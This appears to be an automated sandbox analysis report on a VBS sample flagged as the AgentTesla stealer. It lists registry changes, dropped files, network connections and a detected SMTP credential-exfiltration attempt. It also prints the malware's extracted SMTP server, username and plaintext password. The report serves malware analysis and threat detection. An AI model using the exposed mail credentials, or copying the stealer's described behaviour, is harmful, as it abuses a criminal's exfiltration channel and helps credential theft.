c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\user32.dll
6812"C:\Program Files (x86)\windows mail\wab.exe"C:\Program Files (x86)\Windows Mail\wab.exe
powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Contacts
Version:
10.0.19041.3636 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\mshtml.dll
c:\program files (x86)\windows mail\wab.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\advapi32.dll
AgentTesla
(PID) Process(6812) wab.exe
Protocolsmtp
Hostsmtp.ionos.es
Port587
Usernamerodrigo@diceltro.com
Passwordrodrigo87654321
Total events
17 897
Read events
17 866
Write events
31
Delete events
0

Modification events

(PID) Process:(6036) wscript.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:ProxyBypass
Value:
1
(PID) Process:(6036) wscript.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:IntranetName
Value:
1
(PID) Process:(6036) wscript.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:UNCAsIntranet
Value:
1
(PID) Process:(6036) wscript.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:AutoDetect
Value:
0
(PID) Process:(4916) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:EnableFileTracing
Value:
0
(PID) Process:(4916) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:EnableAutoFileTracing
Value:
0
(PID) Process:(4916) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:EnableConsoleTracing
Value:
0
(PID) Process:(4916) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:FileTracingMask
Value:
(PID) Process:(4916) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:ConsoleTracingMask
Value:
(PID) Process:(4916) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:MaxFileSize
Value:
1048576
Executable files
0
Suspicious files
9
Text files
5
Unknown types
3

Dropped files

PID
Process
Filename
Type
4260powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_ze0ixphy.q4u.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
4260powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_tn3wuukg.vml.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
4260powershell.exeC:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCachebinary
MD5:8E7D26D71A1CAF822C338431F0651251
SHA256:495E7C4588626236C39124CCE568968E874BEDA950319BA391665B43DE111084
4916powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_bzqo30d0.p4c.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
4916powershell.exeC:\Users\admin\AppData\Roaming\Ensidigheden.Reptext
MD5:6CA0F4FDEAD6F9135EEBC746F4F2436C
SHA256:6CFC3AC70094AD615348CCFF11D99516AAF88B7285784EC0FB792C05519C002A
6172FileCoAuth.exeC:\Users\admin\AppData\Local\Microsoft\OneDrive\logs\Common\FileCoAuth-2024-04-30.0615.6172.1.odlbinary
MD5:0674C7FDEE562AB06E3F11F3E587479B
SHA256:B726A4ADEE75169C82C617F38172BE802A37E01052AA1206D91A7AEAA4A833C9
6812wab.exeC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F07644E38ED7C9F37D11EEC6D4335E02_F71C9FE0DBB76538B4EB93E5DEE9B878binary
MD5:E7C091F2BF3A0AA953B677BD0AACC70F
SHA256:56B9D3297DC00116BE49B28E151F76E4FCB19665FB3EEDEEAF6C379753EAD3A2
6812wab.exeC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBAbinary
MD5:AFF59E43FDD3EA82E170CE728F1A9DD4
SHA256:9BDC5F38BE00954A57A68A93239FF1201481A1EAA9787D1F5860750C69207BEA
6812wab.exeC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EAbinary
MD5:9520675832BA4C5EA6A8AA61CE32C25B
SHA256:C5CB6867B8C0B36A196CF103BD14432C74A14E8EAC09E5A4E1F24E6350425D7A
6812wab.exeC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EAder
MD5:6B11A0EFEA747A4CFFD2E63CA1740A2F
SHA256:20794B29B0D071E4B632BEA0446B1DEA7EF431942D5C87F8F1D7895F68059367
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
10
TCP/UDP connections
57
DNS requests
25
Threats
2

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
4232
svchost.exe
GET
200
92.122.89.124:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
unknown
4680
SearchApp.exe
GET
200
192.229.221.95:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTrjrydRyt%2BApF3GSPypfHBxR5XtQQUs9tIpPmhxdiuNkHMEWNpYim8S8YCEAzlnDD9eoNTLi0BRrMy%2BWU%3D
unknown
unknown
1604
svchost.exe
GET
200
192.229.221.95:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D
unknown
unknown
6732
SIHClient.exe
GET
200
92.122.89.124:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl
unknown
unknown
4920
backgroundTaskHost.exe
GET
200
192.229.221.95:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEApDqVCbATUviZV57HIIulA%3D
unknown
unknown
6732
SIHClient.exe
GET
200
92.122.89.124:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl
unknown
unknown
6812
wab.exe
GET
200
142.250.74.195:80
http://ocsp.pki.goog/gsr1/MFEwTzBNMEswSTAJBgUrDgMCGgUABBS3V7W2nAf4FiMTjpDJKg6%2BMgGqMQQUYHtmGkUNl8qJUC99BM00qP%2F8%2FUsCEHe9DWzbNvka6iEPxPBY0w0%3D
unknown
unknown
6812
wab.exe
GET
200
142.250.74.195:80
http://ocsp.pki.goog/gtsr1/ME4wTDBKMEgwRjAJBgUrDgMCGgUABBQwkcLWD4LqGJ7bE7B1XZsEbmfwUAQU5K8rJnEaK0gnhS9SZizv8IkTcT4CDQIDvFNZazTHGPUBUGY%3D
unknown
unknown
6812
wab.exe
GET
200
142.250.74.195:80
http://ocsp.pki.goog/gts1c3/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTHLnmK3f9hNLO67UdCuLvGwCQHYwQUinR%2Fr4XN7pXNPZzQ4kYU83E1HScCEFFNAL5y0qOaCU1agms6UWo%3D
unknown
unknown
6812
wab.exe
GET
200
142.250.74.195:80
http://ocsp.pki.goog/gts1c3/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTHLnmK3f9hNLO67UdCuLvGwCQHYwQUinR%2Fr4XN7pXNPZzQ4kYU83E1HScCEEkpB5wQLOzMEPb%2Fg2UQK5Q%3D
unknown
unknown
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4364
svchost.exe
239.255.255.250:1900
unknown
5140
MoUsoCoreWorker.exe
40.127.240.158:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
unknown
4
System
192.168.100.255:138
whitelisted
4232
svchost.exe
40.127.240.158:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
unknown
928
RUXIMICS.exe
40.127.240.158:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
unknown
4916
powershell.exe
142.250.185.110:443
drive.google.com
GOOGLE
US
whitelisted
4916
powershell.exe
142.250.184.193:443
drive.usercontent.google.com
GOOGLE
US
whitelisted
4232
svchost.exe
92.122.89.124:80
www.microsoft.com
Akamai International B.V.
NL
unknown
4680
SearchApp.exe
23.47.189.136:443
www.bing.com
Akamai International B.V.
PT
unknown
4680
SearchApp.exe
23.47.189.139:443
www.bing.com
Akamai International B.V.
PT
unknown

DNS requests

Domain
IP
Reputation
drive.google.com
  • 142.250.185.110
shared
drive.usercontent.google.com
  • 142.250.184.193
unknown
settings-win.data.microsoft.com
  • 40.127.240.158
whitelisted
www.microsoft.com
  • 92.122.89.124
whitelisted
www.bing.com
  • 23.47.189.139
  • 23.47.188.216
  • 23.47.189.136
  • 23.47.189.169
whitelisted
r.bing.com
  • 23.47.189.136
  • 23.47.188.216
  • 23.47.189.169
  • 23.47.189.139
whitelisted
login.live.com
  • 40.126.32.68
  • 40.126.32.138
  • 40.126.32.76
  • 20.190.160.22
  • 20.190.160.20
  • 20.190.160.17
  • 40.126.32.72
  • 40.126.32.133
whitelisted
ocsp.digicert.com
  • 192.229.221.95
whitelisted
go.microsoft.com
  • 2.19.33.158
whitelisted
client.wns.windows.com
  • 40.113.110.67
whitelisted

Threats

PID
Process
Class
Message
6812
wab.exe
Misc activity
INFO [ANY.RUN] SMTP email client opens transfer with server (EHLO)
6812
wab.exe
Successful Credential Theft Detected
STEALER [ANY.RUN] Attempt to exfiltrate via SMTP
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2025 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
4126d514421517e58e9d464eea10dc9fb1027b768d37d3ba0e30c1578773479e.vbs